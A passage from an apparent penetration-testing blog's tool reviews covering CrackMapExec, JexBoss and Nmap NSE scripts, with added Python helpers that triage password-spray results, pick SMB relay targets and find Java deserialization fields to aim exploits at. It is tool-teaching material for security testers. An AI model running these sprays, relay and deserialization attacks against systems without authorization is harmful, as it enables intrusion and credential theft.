<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiwsDF8qGQ5_hYIzCeWpCit6vR5FV9HahGM_vXrCBXtZKkWEv2YUlbCWKzW6neSdWNuRbpL4gcDIPa1G2SbCYyYURX8znVIikqDDcyqHlrt0x2Yk3CnespI8wcM_g4pbqTEd5wtrLcwwg/s1600/cme_1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="683" data-original-width="1182" height="230" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiwsDF8qGQ5_hYIzCeWpCit6vR5FV9HahGM_vXrCBXtZKkWEv2YUlbCWKzW6neSdWNuRbpL4gcDIPa1G2SbCYyYURX8znVIikqDDcyqHlrt0x2Yk3CnespI8wcM_g4pbqTEd5wtrLcwwg/s400/cme_1.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
It also provides help specific to each protocol; for example, here is a sample of the help for the "smb" protocol:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzEJ_bOR84di2cu3By11AMMZ53YUc3cCpk9PXOvnPvrVpiSkPhusj0Pt5GcS3SSJRCSguZU2JfUGnYDk8ywqplJ6Fq04ijGwKUtEfHda6w5J_H__-UiYSxASvoLDBEUXkZ9iJE8eUSQTA/s1600/cme_2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="830" data-original-width="710" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzEJ_bOR84di2cu3By11AMMZ53YUc3cCpk9PXOvnPvrVpiSkPhusj0Pt5GcS3SSJRCSguZU2JfUGnYDk8ywqplJ6Fq04ijGwKUtEfHda6w5J_H__-UiYSxASvoLDBEUXkZ9iJE8eUSQTA/s400/cme_2.png" width="341" /></a></div>
<br />
For the "smb" protocol, there are a number of different modules that can be used as well:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyMYrsAkgmI175cu9UGcHrKIFuyP91QL24PIr-UjxSh-Rf2xrhFku9uosI82_ddlBMnVk3cKAC_xzM8E92ndDi1HIsAFPFV184478ZIUPITWyIO4FAW9lsdqt98MLxx_0uT61CL4TEi9Q/s1600/cme_3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="560" data-original-width="1552" height="142" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyMYrsAkgmI175cu9UGcHrKIFuyP91QL24PIr-UjxSh-Rf2xrhFku9uosI82_ddlBMnVk3cKAC_xzM8E92ndDi1HIsAFPFV184478ZIUPITWyIO4FAW9lsdqt98MLxx_0uT61CL4TEi9Q/s400/cme_3.png" width="400" /></a></div>
<br />
<br /></div>
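The output CME writes during a run is one line per host, with the protocol, IP, port and hostname in fixed columns followed by a tag (<i>[*]</i> for information, <i>[+]</i> for a successful login, <i>[-]</i> for a failure) and a message, with <i>(Pwn3d!)</i> appended when the credentials are a local administrator on that host. Spraying one set of credentials across a /24 produces hundreds of those lines, so here is a small added example (not code from CrackMapExec or this post) that sorts a captured run into hosts where the account is admin, hosts where it is merely valid, hosts where it failed, and hosts whose banner reports SMB signing disabled. The sample lines are constructed for the example, and the column layout they assume is CME's default output as I have seen it, not something documented on this page.

```python
import re
from collections import defaultdict

# Constructed sample of a CME "smb" sweep. Hosts, names and the
# credential are made up for this example.
SAMPLE_OUTPUT = """\
SMB         192.168.1.10    445    DC01             [*] Windows Server 2016 Standard 14393 x64 (name:DC01) (domain:CORP) (signing:True) (SMBv1:True)
SMB         192.168.1.10    445    DC01             [+] CORP\\jdoe:Password1 (Pwn3d!)
SMB         192.168.1.20    445    FILE01           [*] Windows Server 2012 R2 Standard 9600 x64 (name:FILE01) (domain:CORP) (signing:False) (SMBv1:True)
SMB         192.168.1.20    445    FILE01           [+] CORP\\jdoe:Password1
SMB         192.168.1.30    445    WS07             [*] Windows 7 Professional 7601 Service Pack 1 x64 (name:WS07) (domain:CORP) (signing:False) (SMBv1:True)
SMB         192.168.1.30    445    WS07             [-] CORP\\jdoe:Password1 STATUS_LOGON_FAILURE
"""

# Assumed column layout: protocol, IP, port, hostname, [tag], message.
LINE_RE = re.compile(
    r"^(?P<proto>\S+)\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<port>\d+)\s+"
    r"(?P<host>\S+)\s+\[(?P<tag>[*+\-!])\]\s+(?P<msg>.*)$"
)


def parse_lines(text):
    """Yield one dict per result line; banner and blank lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line.rstrip())
        if m:
            yield m.groupdict()


def triage(text):
    """Sort a CME run into buckets of IPs.

    admin:       [+] with (Pwn3d!)  -> the account is a local admin there
    valid:       [+] without it     -> creds work but carry no admin rights
    failed:      [-]                -> logon failed (wrong creds, locked, ...)
    signing_off: [*] banner reports signing:False -> SMB relay candidate
    """
    buckets = defaultdict(set)
    for rec in parse_lines(text):
        tag, msg, ip = rec["tag"], rec["msg"], rec["ip"]
        if tag == "+":
            buckets["admin" if "(Pwn3d!)" in msg else "valid"].add(ip)
        elif tag == "-":
            buckets["failed"].add(ip)
        elif tag == "*" and "(signing:False)" in msg:
            buckets["signing_off"].add(ip)
    return {name: sorted(ips) for name, ips in buckets.items()}


if __name__ == "__main__":
    for bucket, ips in sorted(triage(SAMPLE_OUTPUT).items()):
        print(f"{bucket:12s} {', '.join(ips)}")
```

Run something like <i>crackmapexec smb 192.168.1.0/24 -u jdoe -p Password1 | tee cme.log</i> and hand the saved file to <i>triage()</i>; the <i>admin</i> bucket is where you go for secrets first, and the <i>signing_off</i> bucket is the host list you would feed to an SMB relay setup next.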
<div>
<h2 style="text-align: left;">
Video</h2>
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/I2ctzF1tZX8/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/I2ctzF1tZX8?feature=player_embedded" width="320"></iframe></div>
</div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5789294398760146186.post-68793300428069411192018-02-12T08:08:00.003-05:002020-11-17T12:46:14.942-05:00Tool Review - JexBoss<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgy3RSpGe9zs9jbZZrvJjiSv2gG7XaFA6jXs6QNGCI_HAKcvDES1drm6WZ9b998j-4_kbFSliiyKnFpGBbhXA-ZGGQUG4Onh3agxZS59SIfE0sanhXoGRdPK2SI-kxMx-4tUO-KFHa4oOQ/s1600/jexboss_logo.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="156" data-original-width="517" height="120" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgy3RSpGe9zs9jbZZrvJjiSv2gG7XaFA6jXs6QNGCI_HAKcvDES1drm6WZ9b998j-4_kbFSliiyKnFpGBbhXA-ZGGQUG4Onh3agxZS59SIfE0sanhXoGRdPK2SI-kxMx-4tUO-KFHa4oOQ/s400/jexboss_logo.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<h2 style="text-align: left;">
Source</h2>
<a href="https://github.com/joaomatosf/jexboss">https://github.com/joaomatosf/jexboss</a><br />
<h2 style="text-align: left;">
<br /></h2><span><a name='more'></a></span>
<h2 style="text-align: left;">
Author(s)</h2>
João Filho Matos Figueiredo/<a href="https://twitter.com/joaomatosf">@joaomatosf</a><br />
<h2 style="text-align: left;">
Description</h2>
<div>
<div style="text-align: left;">
JexBoss is just the shortened name for the "JBoss (and other Java Deserialization Vulnerabilities) verify and EXploitation Tool"</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
JexBoss is a Python tool designed to identify/test for the presence of various exploitable vulnerabilities found in the JBoss Application Server, Tomcat, Jenkins, and other Java frameworks and platforms.</div>
<h2 style="text-align: left;">
License</h2>
<a href="https://github.com/joaomatosf/jexboss/blob/master/LICENSE">Apache License, Version 2.0</a><br />
<h2 style="text-align: left;">
How to Install</h2>
On most Linux systems, the user will probably just download the source from GitHub:</div>
<blockquote class="tr_bq">
<i>git clone </i><i>https://github.com/joaomatosf/jexboss.git</i></blockquote>
<div>
and then they will need to ensure all dependencies are installed:</div>
<div>
<blockquote class="tr_bq">
<i>pip install -r requires.txt</i></blockquote>
<div style="text-align: left;">
Or the user could download the latest version from GitHub as follows:</div>
<blockquote class="tr_bq" style="overflow-wrap: break-word; text-align: left; white-space: pre-wrap; word-wrap: break-word;">
<i>Download the latest version at: https://github.com/joaomatosf/jexboss/archive/master.zip</i><br /><i>unzip master.zip</i><br /><i>cd jexboss-master</i><br /><i>pip install -r requires.txt</i></blockquote>
<div style="overflow-wrap: break-word; text-align: left; white-space: pre-wrap; word-wrap: break-word;">
JexBoss can also be installed on Windows systems. According to the developer, the user can use <a href="https://github.com/git-for-windows/git/releases/tag/v2.10.1.windows.1">Git Bash</a> to run JexBoss. Follow the steps below:</div>
<ul style="text-align: left;">
<li><i>Download and install <a href="https://www.python.org/downloads/release/python-2712/">Python</a></i></li>
<li><i>Download and install <a href="https://github.com/git-for-windows/git/releases/tag/v2.10.1.windows.1">Git for Windows</a></i></li>
<li><i>After installing, run the Git for Windows and type the following commands:</i></li>
</ul>
<blockquote class="tr_bq">
<i>PATH=$PATH:C:\Python27\<br />PATH=$PATH:C:\Python27\Scripts<br />git clone https://github.com/joaomatosf/jexboss.git<br />cd jexboss<br />pip install -r requires.txt</i></blockquote>
<h2 style="text-align: left;">
Sample Usage</h2>
As with most Linux tools, JexBoss comes with the typical "-h" flag to display the help/usage:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9__FsLDAUUX-LtTidz3BKOy0VLSEpqg9EMdUOm9xHgiMwiqC9htx4XiomzCmWlt4n4C95BBA8KLHqSIxlKuHiTFQoYv2ZpK5uocT3D-uWBwhs_3Ah8ni_gmnlPAA9c6k0Bc1t9uT1b6U/s1600/jexboss1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="814" data-original-width="922" height="282" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9__FsLDAUUX-LtTidz3BKOy0VLSEpqg9EMdUOm9xHgiMwiqC9htx4XiomzCmWlt4n4C95BBA8KLHqSIxlKuHiTFQoYv2ZpK5uocT3D-uWBwhs_3Ah8ni_gmnlPAA9c6k0Bc1t9uT1b6U/s320/jexboss1.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcIxm-vb36T2WSdPV1Pk04Gsepg-OZ9ep_xZ-gJ2QbhAsg5fkYFwcLBDPdZRkQrC2sdEz5IbxpADTVIyCCM_1g4ptgyc0EIPj5ZfDEfY7uiZoIMKMukKSWBxb_Q06qzhlBHTHGur-Radk/s1600/jexboss2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="443" data-original-width="923" height="153" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcIxm-vb36T2WSdPV1Pk04Gsepg-OZ9ep_xZ-gJ2QbhAsg5fkYFwcLBDPdZRkQrC2sdEz5IbxpADTVIyCCM_1g4ptgyc0EIPj5ZfDEfY7uiZoIMKMukKSWBxb_Q06qzhlBHTHGur-Radk/s320/jexboss2.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrAXHrMBdQ0jwM2cW3DUuvS1G6K6nq_VUz51brG7sHNeHRNXTce4O5d8MATuX0HYB-WjwCXhkTQk50H9Ub-eat-QiWhSdExzCZ-2SHx_7ofuUMyAnYYCKo9p6QA1aKXmCh4_T2uLRcCdY/s1600/jexboss3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="813" data-original-width="921" height="282" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrAXHrMBdQ0jwM2cW3DUuvS1G6K6nq_VUz51brG7sHNeHRNXTce4O5d8MATuX0HYB-WjwCXhkTQk50H9Ub-eat-QiWhSdExzCZ-2SHx_7ofuUMyAnYYCKo9p6QA1aKXmCh4_T2uLRcCdY/s320/jexboss3.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXya8bFhuaTBHBm76D4dohAx2VwwM90TF22IGJoUbn54pGY6aTJq4BfHJNVxmyBWepV7epfYlXeF1jfuCxni5UpMMYadvDYAUe6q_BojE-ZDipUWJ0uQ1K2eRZ0iaK_zshcWAtnCSb928/s1600/jexboss4.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="730" data-original-width="923" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXya8bFhuaTBHBm76D4dohAx2VwwM90TF22IGJoUbn54pGY6aTJq4BfHJNVxmyBWepV7epfYlXeF1jfuCxni5UpMMYadvDYAUe6q_BojE-ZDipUWJ0uQ1K2eRZ0iaK_zshcWAtnCSb928/s320/jexboss4.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
That shows the syntax to execute JexBoss is:<br />
<blockquote class="tr_bq">
<i>usage: JexBoss [-h] [--version] [--auto-exploit] [--disable-check-updates]<br />
[-mode {standalone,auto-scan,file-scan}] [--app-unserialize]<br />
[--servlet-unserialize] [--jboss] [--jenkins] [--struts2]<br />
[--jmxtomcat] [--proxy PROXY] [--proxy-cred LOGIN:PASS]<br />
[--jboss-login LOGIN:PASS] [--timeout TIMEOUT]<br />
[--cookies NAME=VALUE] [--reverse-host RHOST:RPORT] [--cmd CMD]<br />
[--dns URL] [--windows] [--post-parameter PARAMETER]<br />
[--show-payload]<br />
[--gadget {commons-collections3.1,commons-collections4.0,jdk7u21,jdk8u20,groovy1,dns}]<br />
[--load-gadget FILENAME] [--force] [-host HOST]<br />
[-network NETWORK] [-ports PORTS] [-results FILENAME]<br />
[-file FILENAME_HOSTS] [-out FILENAME_RESULTS]</i></blockquote>
</div>
<div>
As with most tools, not all of those command line options are necessary. At the very minimum, the user needs to give it a target, using the <i>-host</i> option listed in the usage above:</div>
<blockquote class="tr_bq">
<i>jexboss.py -host <hostname/IP/URL></i></blockquote>
<div>
Beyond that simple command, the user can specify any of the other options as well, depending on their needs. Some of the other command line options include flags for enabling auto-exploitation of vulnerable systems, flags to test for just one of JBoss, Jenkins, Struts2, or Tomcat, and flags to specify login credentials.</div>
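The <i>--app-unserialize</i> and <i>--servlet-unserialize</i> options target applications that deserialize a Java object handed to them in a cookie or request parameter, and <i>--post-parameter</i> tells JexBoss which parameter to use. Before aiming the tool, it helps to know which request fields actually carry a serialized object. As an added example (not part of JexBoss or this post), the function below checks a set of cookies and parameters for the Java serialization stream header, either raw (<i>AC ED 00 05</i>) or base64-encoded (the familiar <i>rO0AB</i> prefix), which is the marker a deserialization test keys on. The field names and values are constructed for the example.

```python
import base64
import binascii

# Every stream written by java.io.ObjectOutputStream starts with
# STREAM_MAGIC (0xACED) followed by STREAM_VERSION (0x0005).
JAVA_SER_MAGIC = b"\xac\xed\x00\x05"


def _try_base64(text):
    """Decode standard or URL-safe base64, tolerating stripped padding.

    Returns the raw bytes, or None when the value is not valid base64.
    """
    text = text.strip()
    if not text:
        return None
    padded = text + "=" * (-len(text) % 4)
    for candidate in (padded, padded.translate(str.maketrans("-_", "+/"))):
        try:
            return base64.b64decode(candidate, validate=True)
        except (binascii.Error, ValueError):
            continue
    return None


def looks_serialized(value):
    """True if value is a raw or base64-encoded Java serialization stream."""
    if isinstance(value, bytes):
        return value.startswith(JAVA_SER_MAGIC)
    if value.encode("latin-1", "ignore").startswith(JAVA_SER_MAGIC):
        return True
    decoded = _try_base64(value)
    return decoded is not None and decoded.startswith(JAVA_SER_MAGIC)


def find_serialized_fields(fields):
    """Names of the cookies/parameters that carry a Java object."""
    return sorted(name for name, value in fields.items() if looks_serialized(value))


# Constructed request fields for the example. A real stream carries a full
# class description after the header; only the prefix matters here.
_OBJ = JAVA_SER_MAGIC + b"sr\x00\x0bjava.util.B"
SAMPLE_FIELDS = {
    "session_state": base64.b64encode(_OBJ).decode(),         # typical cookie
    "token": base64.b64encode(_OBJ).decode().rstrip("="),     # padding stripped
    "raw_obj": _OBJ,                                          # raw POST body
    "viewstate": base64.b64encode(b"plain text, not an object").decode(),
    "page": "3",
    "lang": "en-US",
}


if __name__ == "__main__":
    print("candidate fields for --app-unserialize:",
          find_serialized_fields(SAMPLE_FIELDS))
```

Anything this flags is a field worth passing to JexBoss with <i>--app-unserialize</i> and <i>--post-parameter</i> (or <i>--cookies</i>); anything it does not flag is most likely not a deserialization sink, no matter how long and opaque the value looks.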
<div>
<h2 style="text-align: left;">
Video</h2>
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/1OQfDjooaRE/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/1OQfDjooaRE?feature=player_embedded" width="320"></iframe></div>
<br /></div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5789294398760146186.post-63526788770443211492018-02-05T08:13:00.003-05:002020-11-17T12:46:27.146-05:00Intro to Programming - Part 1<div dir="ltr" style="text-align: left;" trbidi="on">
This is my first post of a new series of programming centric posts. This series will be starting with a short overview of common programming topic without going into too much depth on basic concepts like, <i>What is a programming Language</i>, <i>What is a variable</i>, etc...<br />
<br />
There are entire courses, college classes, and so on available if someone really wants to learn the topics in more detail.<br />
<br />
The purpose of this "Intro to Programming" series is to make sure everyone has at least a basic understanding before I get into the next series on "Intro to Python Programming". Once that series is complete, I will be moving on into "Python for Pentesters".<br />
<br />
<b>Video:</b><br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/jrOfxRPv48c/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/jrOfxRPv48c?feature=player_embedded" width="320"></iframe></div>
<br />
<br />
<b>SlideDeck via SlideShare:</b><br />
<div style="text-align: center;">
<iframe allowfullscreen="" frameborder="0" height="485" marginheight="0" marginwidth="0" scrolling="no" src="//www.slideshare.net/slideshow/embed_code/key/uAQQpIrW9Am6qk" style="border-width: 1px; border: 1px solid #ccc; margin-bottom: 5px; max-width: 100%;" width="595"> </iframe> <br />
<div style="margin-bottom: 5px;">
<strong> <a href="https://www.slideshare.net/AdamCompton4/intro-toprograming-part1" target="_blank" title="Intro to programing part1">Intro to programing part1</a> </strong> from <strong><a href="https://www.slideshare.net/AdamCompton4" target="_blank">Adam Compton</a></strong> </div>
</div>
</div><span><a name='more'></a></span>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5789294398760146186.post-16462795041825905242018-01-29T08:04:00.001-05:002020-11-17T12:46:35.728-05:00Tool Review - Nmap NSE Scripts<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://nmap.org/images/nmap-logo-256x256.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="256" data-original-width="256" src="https://nmap.org/images/nmap-logo-256x256.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<h2 style="text-align: left;">
Source</h2>
<a href="https://nmap.org/">https://nmap.org/</a><br />
<a href="https://github.com/nmap/nmap">https://github.com/nmap/nmap</a><br />
<a href="https://svn.nmap.org/">https://svn.nmap.org/</a><br />
<h2 style="text-align: left;">
<br /></h2><span><a name='more'></a></span>
<h2 style="text-align: left;">
Author(s)</h2>
Originally written by <a href="http://insecure.org/fyodor/">Gordon Lyon (Fyodor Vaskovich)</a><br />
As Nmap is open source, many other people have contributed to it over the years.<br />
<h2 style="text-align: left;">
Description</h2>
<div>
Nmap is probably one of the most, if not the most, recognized and widely used security tools. Among Nmap's features are host discovery, port scanning, service version detection, OS detection, and the Nmap Scripting Engine (NSE).<br />
<h2 style="text-align: left;">
License</h2>
<a href="https://nmap.org/book/man-legal.html">Custom License based on GPLv2</a><br />
<h2 style="text-align: left;">
How to Install</h2>
On most Linux systems, there will be a prepackaged bundle for it. For example, on <a href="https://www.kali.org/">Kali Linux</a>, it is easy to install it from apt:<br />
<blockquote class="tr_bq">
<i>apt-get install nmap </i></blockquote>
However, if the user wishes to have the latest and greatest version of Nmap, they will need to download it and install it from source:</div>
<blockquote class="tr_bq">
<i>git clone </i><i>https://github.com/nmap/nmap.git</i></blockquote>
<div>
and then they will need to configure and build the binaries:</div>
<div>
<blockquote class="tr_bq">
<i>cd nmap</i><br />
<i>./configure</i><br />
<i>make</i><br />
<i>make install</i></blockquote>
<div style="text-align: left;">
A very in-depth installation guide can be found <a href="https://nmap.org/book/install.html">here</a>.</div>
<h2 style="text-align: left;">
Sample NSE Usage</h2>
It is the NSE that we will be looking at today. As I stated above, many people know of and have used Nmap and as such, I do not plan on covering all of the standard uses and features of it; there are plenty of other blogs, videos, and books out there already for that. Instead, I want to focus on the NSE and how it can be used in a penetration assessment.<br />
<br />
At the time of writing this article, there are <a href="https://nmap.org/nsedoc/index.html">586 NSE scripts</a>. Those are associated with 14 (15 if you include the "all" category) script categories:<br />
<div style="text-align: left;">
</div>
<ul>
<li>all</li>
<li>auth</li>
<li>broadcast</li>
<li>brute</li>
<li>default</li>
<li>discovery</li>
<li>dos</li>
<li>exploit</li>
<li>external</li>
<li>fuzzer</li>
<li>intrusive</li>
<li>malware</li>
<li>safe</li>
<li>version</li>
<li>vuln</li>
</ul>
<br />
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
To use any of the scripts, the user will need to specify them on the command line using the "<i>--script</i>" flag. For example, if they wished to execute the <i>smb-security-mode.nse</i> script, they would type:</div>
<blockquote class="tr_bq">
<i>nmap --script smb-security-mode.nse -p 445 <target IP></i></blockquote>
Multiple scripts can be specified at one time by separating them with a comma:<br />
<blockquote class="tr_bq">
<i>nmap --script smb-security-mode.nse,smb-os-discovery.nse -p 445 <target IP></i></blockquote>
Similarly, an entire category can be specified:<br />
<blockquote class="tr_bq">
<i>nmap --script discovery <target IP></i></blockquote>
A more complicated selection of scripts can be determined using the <i>and</i>, <i>or</i>, and <i>not</i> operators. For example, if the user wished to run every script except those in the <i>dos</i> category:<br />
<blockquote class="tr_bq">
<i>nmap --script "not dos" <target IP></i></blockquote>
Or possibly all scripts that are in the vuln category but also the safe category:<br />
<blockquote class="tr_bq">
<i>nmap --script "vuln and safe" <target IP></i></blockquote>
<div>
By utilizing the script categories, boolean operators, and single script selections, it is possible to be very specific in determining the script selections.</div>
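Under the hood, Nmap resolves the <i>--script</i> argument by comparing each name in the expression against every script's categories and file name (with or without <i>.nse</i>, and with shell-style wildcards such as <i>smb-*</i>), treating <i>all</i> as matching everything, and combining the results with <i>and</i>, <i>or</i>, <i>not</i>, parentheses, and commas. The following is an added example, not Nmap's own code, that reimplements that selection rule in Python against a small constructed table of scripts so you can see what an expression will pick before pointing it at a live host. The categories in the table are what I recall from the script headers; verify them with <i>nmap --script-help smb-vuln-ms17-010</i> and so on before relying on them. Comparing names case-insensitively is an assumption made here to keep the example short.

```python
import fnmatch
import re

# Constructed sample table: script name -> categories. Taken from memory
# of the script headers; check with `nmap --script-help <script>`.
SCRIPTS = {
    "smb-security-mode": {"default", "discovery", "safe"},
    "smb-os-discovery":  {"default", "discovery", "safe"},
    "smb-vuln-ms17-010": {"vuln", "safe"},
    "smb-vuln-ms08-067": {"vuln", "intrusive", "exploit"},
    "http-slowloris":    {"dos", "intrusive"},
    "ssh-brute":         {"brute", "intrusive"},
}

_TOKEN_RE = re.compile(r"\(|\)|,|[^\s(),]+")


class ScriptSelector:
    """Evaluate an nmap --script expression against one script.

    Grammar (lowest to highest precedence):
        list := expr ("," expr)*          a comma acts like "or"
        expr := term ("or" term)*
        term := fact ("and" fact)*
        fact := "not" fact | "(" list ")" | NAME
    NAME matches a category exactly, or the script's file name (optionally
    ending in .nse, shell wildcards allowed); "all" matches every script.
    Names are compared case-insensitively here (an assumption).
    """

    def __init__(self, expr):
        self.tokens = _TOKEN_RE.findall(expr)

    def matches(self, name, categories):
        self.pos = 0
        self.name = name.lower()
        self.cats = {c.lower() for c in categories}
        result = self._list()
        if self.pos != len(self.tokens):
            raise ValueError("unexpected token %r" % self.tokens[self.pos])
        return result

    # -- recursive-descent helpers ------------------------------------
    def _peek(self):
        return self.tokens[self.pos] if self.pos < len(self.tokens) else None

    def _next(self):
        tok = self._peek()
        self.pos += 1
        return tok

    def _list(self):
        val = self._expr()
        while self._peek() == ",":
            self._next()
            val = self._expr() or val
        return val

    def _expr(self):
        val = self._term()
        while self._peek() == "or":
            self._next()
            val = self._term() or val
        return val

    def _term(self):
        val = self._fact()
        while self._peek() == "and":
            self._next()
            rhs = self._fact()
            val = val and rhs
        return val

    def _fact(self):
        tok = self._next()
        if tok is None:
            raise ValueError("unexpected end of expression")
        if tok == "not":
            return not self._fact()
        if tok == "(":
            val = self._list()
            if self._next() != ")":
                raise ValueError("missing ')'")
            return val
        if tok in (")", ",", "and", "or"):
            raise ValueError("unexpected token %r" % tok)
        return self._match_name(tok)

    def _match_name(self, tok):
        tok = tok.lower()
        if tok == "all":
            return True
        if tok.endswith(".nse"):
            tok = tok[:-4]
        return tok in self.cats or fnmatch.fnmatchcase(self.name, tok)


def select(expr, scripts=SCRIPTS):
    """Return the sorted script names that expr would select."""
    selector = ScriptSelector(expr)
    return sorted(name for name, cats in scripts.items() if selector.matches(name, cats))


if __name__ == "__main__":
    for expr in ("vuln and safe", "not dos", "smb-vuln-*", "(vuln and not safe) or brute"):
        print("%-32s -> %s" % (expr, ", ".join(select(expr))))
```

The practical point is the difference between <i>vuln</i> and <i>"vuln and safe"</i>: the former also pulls in scripts tagged <i>intrusive</i> or <i>exploit</i>, which on a production assessment is usually not what you want running unannounced.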
<div>
<br /></div>
Yes that was a lot of information there and yes I could probably write an entire book on just that (and I am sure someone probably already has), but for this article, I wish to focus mostly on the <i>vuln</i> script category.<br />
<br />
First, let's try to find any Windows/SMB vulnerabilities on a target system:<br />
<blockquote class="tr_bq">
<i>nmap --script vuln -p445 <target IP></i></blockquote>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggwNhmqr3YRMTbfXh8fF8JMZW8G8hyphenhyphenotKKQLIDqyTumvglOtT512hzfwlyM6gvXrRq-JNJiTdzCNPkjvQ33q3dvKQI4Ni6mz47MjVSQOmOmiP1VqxvayUxEWtYa6LjPvCHemQV3azaSiA/s1600/nmap_script_1.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="777" data-original-width="1358" height="228" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggwNhmqr3YRMTbfXh8fF8JMZW8G8hyphenhyphenotKKQLIDqyTumvglOtT512hzfwlyM6gvXrRq-JNJiTdzCNPkjvQ33q3dvKQI4Ni6mz47MjVSQOmOmiP1VqxvayUxEWtYa6LjPvCHemQV3azaSiA/s400/nmap_script_1.jpg" width="400" /></a></div>
<div>
<br /></div>
<div>
So, this particular host appears to be missing a few critical patches which we would likely be able to exploit and gain access.</div>
<div>
<br /></div>
<div>
But that was just for port 445/tcp. What does this look like for other ports, such as 5432/tcp (PostgreSQL)? Leaving off <i>-p</i> lets Nmap scan its default port list, and the expression is quoted so that the shell does not try to interpret the parentheses:</div>
<blockquote class="tr_bq">
<i>nmap --script "(vuln and safe)" <target IP></i></blockquote>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqtp84O8QBDAYPtNZlLd7NNQrr02YxMMUv0ZlLv7e6q-zV7X6aT5efozGbFLT2ny2h-L748SDEo6MZy6npuROQj9z2rMYIwfljbvPjkLXWhEIUkJhEcJjXCNcUj_sDo02drrCdIAINKB4/s1600/nmap_script_2.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="424" data-original-width="1003" height="168" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqtp84O8QBDAYPtNZlLd7NNQrr02YxMMUv0ZlLv7e6q-zV7X6aT5efozGbFLT2ny2h-L748SDEo6MZy6npuROQj9z2rMYIwfljbvPjkLXWhEIUkJhEcJjXCNcUj_sDo02drrCdIAINKB4/s400/nmap_script_2.jpg" width="400" /></a></div>
<div>
<br /></div>
This was just a sampling of the types of findings that Nmap is able to identify.<br />
<br />
That will be enough for this article. I may do another article on Nmap in the future, but for now, this should be enough to get people interested in looking into the other items that Nmap can do. Now go out and try it out on your own test network.</div>
<div>
<h2 style="text-align: left;">
Video</h2>
</div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/9ASPbGcTajo/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/9ASPbGcTajo?feature=player_embedded" width="320"></iframe></div>
<br /></div>
<div>
<br /></div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5789294398760146186.post-88904775235045334352018-01-22T09:16:00.001-05:002020-11-17T12:46:43.455-05:00Tool Review - BruteSpray<div dir="ltr" style="text-align: left;" trbidi="on">
